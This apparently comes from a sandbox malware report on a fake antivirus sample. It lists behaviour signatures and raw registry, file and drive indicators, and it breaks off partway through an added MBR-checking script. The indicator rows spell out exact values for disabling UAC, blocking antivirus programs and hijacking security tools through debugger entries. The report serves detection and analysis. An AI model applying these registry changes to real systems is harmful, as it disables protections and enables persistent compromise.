Malware Analysis Report

2025-08-05 20:09

Sample ID 240302-2g86qsad96
Target Fake AV.zip
SHA256 aee69ef9040e902b7a6639d7594df47e0e73625143a671583db8b85be525a3e5
Tags bootkit discovery evasion persistence spyware stealer trojan upx
Score 10/10


Analysis Overview

Score 10/10

SHA256 aee69ef9040e902b7a6639d7594df47e0e73625143a671583db8b85be525a3e5

Threat Level: Known bad

The file Fake AV.zip was found to be: Known bad.

Malicious Activity Summary

bootkit discovery evasion persistence spyware stealer trojan upx

Modifies WinLogon for persistence

Windows security bypass

UAC bypass

Modifies security service

Checks for common network interception software

Enumerates VirtualBox registry keys

Drops file in Drivers directory

Sets service image path in registry

Blocks application from running via registry modification

Sets file execution options in registry

Disables RegEdit via registry modification

Adds policy Run key to start application

Loads dropped DLL

Modifies system executable filetype association

Unexpected DNS network traffic destination

Executes dropped EXE

UPX packed file

Checks BIOS information in registry

Checks computer location settings

Windows security modification

Deletes itself

Reads user/profile data of web browsers

Maps connected drives based on registry

Checks registry for disk virtualization

Checks installed software on the system

Writes to the Master Boot Record (MBR)

Drops desktop.ini file(s)

Checks whether UAC is enabled

Enumerates connected drives

Checks for any installed AV software in registry

Adds Run key to start application

Suspicious use of SetThreadContext

Suspicious use of NtCreateThreadExHideFromDebugger

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Enumerates physical storage devices

Unsigned PE

Program crash

NSIS installer

Runs net.exe

Checks processor information in registry

Suspicious use of SetWindowsHookEx

Uses Volume Shadow Copy WMI provider

Runs ping.exe

System policy modification

Modifies Internet Explorer settings

Modifies Internet Explorer start page

Modifies system certificate store

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Modifies registry class

Suspicious use of SendNotifyMessage

Enumerates system info in registry

Views/modifies file attributes

Suspicious behavior: GetForegroundWindowSpam

Gathers network information

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: MapViewOfSection

Modifies data under HKEY_USERS

Script User-Agent

Suspicious use of FindShellTrayWindow

Kills process with taskkill

Uses Volume Shadow Copy service COM API

Suspicious use of AdjustPrivilegeToken

Checks SCSI registry key(s)

Suspicious behavior: LoadsDriver

Suspicious use of UnmapMainImage

Uses Task Scheduler COM API

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2024-03-02 22:34

Signatures

UPX packed file

upx

Unsigned PE


NSIS installer

installer

Analysis: behavioral23

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win7-20240221-en

Max time kernel

146s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe"

Signatures

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "2" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "2" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Checks for common network interception software

evasion

Enumerates VirtualBox registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Blocks application from running via registry modification

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "avgscanx.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "avgcfgex.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "avgui.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\12 = "avgemc.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\13 = "avgchsvx.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\14 = "avgcmgr.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\15 = "avgwdsvc.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "egui.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "avgnt.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "avcenter.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "avscan.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "avgfrw.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "avgtray.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "MSASCui.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "ekrn.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\ C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\0 = "msseces.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened for modification C:\Windows\system32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File created C:\Windows\system32\drivers\etc\host_new C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Sets file execution options in registry

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\support.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\gav.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install[5].exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\alogserv.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\navwnt.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pspf.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fameh32.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ntrtscan.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pctsSvc.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\livesrv.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avxmonitor9x.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\espwatch.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\teekids.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\OLT.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lockdown2000.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nvc95.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MPFSrv.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icsuppnt.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kerio-wrp-421-en-win.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\realmon.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\jdbgmrg.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kerio-wrl-421-en-win.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\drweb32.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winmain.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cfpconfg.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fsav530wtbyb.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vscan40.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SaveArmor.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\istsvc.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AlphaAV.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avwupd32.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\htpatch.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sofi.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\McSACore.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icsupp95.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\portdetective.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procdump.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bundle.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sahagent.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\system.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vnpc3000.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\guard.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\signcheck.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PSUNMain.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iedriver.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setupvameeval.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\zonealarm.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cfinet32.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Anti-Virus Professional.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SaveArmor.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashQuick.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\alogserv.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fp-win.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fsgk32.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pcfwallicon.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ray.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bootconf.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cfgwiz.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lnetinfo.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WebProxy.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\escanv95.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\navapsvc.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscfxav.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscfxas.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Reads user/profile data of web browsers

spyware stealer

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 208.67.220.220 N/A N/A
Destination IP 208.67.222.222 N/A N/A
(Each of the two addresses was contacted repeatedly during the run; identical rows are collapsed above. Both addresses belong to the OpenDNS public resolver service, so this signature reflects DNS queries sent to a resolver other than the one configured on the sandbox host.)

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\Internet Security Guard = "\"C:\\ProgramData\\950a2\\ISd8b.exe\" /s /d" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Checks for any installed AV software in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Eset\Nod\ C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
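
A write handle to \??\PhysicalDrive0 is the only fact the report records about the MBR; it does not say what was written. The practical follow-up is to pull sector 0 from the affected disk and compare it against a known-good copy. The following parser is an added example, not part of this report or of the sample: it decodes the 512-byte MBR layout (440 bytes of boot code, 4-byte disk signature, four 16-byte partition entries, 0x55AA trailer), hashes the boot-code region and applies a few sanity checks. It runs on a constructed sector so it works offline; the baseline hash, the stand-in boot code bytes and the partition layout are all made up for the example, and on a real system you would read \\.\PhysicalDrive0 as administrator and supply a baseline taken from a clean image of the same machine.

```python
"""Parse and integrity-check a 512-byte MBR sector (example added to this report)."""
import hashlib
import struct
from typing import List, Optional

MBR_SIZE = 512
BOOT_CODE_LEN = 440            # boot code occupies bytes 0..439; the disk signature follows at 440..443
PART_TABLE_OFFSET = 446        # four 16-byte partition entries at 446..509
PART_ENTRY_SIZE = 16
BOOT_SIGNATURE = b"\x55\xaa"   # bytes 510..511
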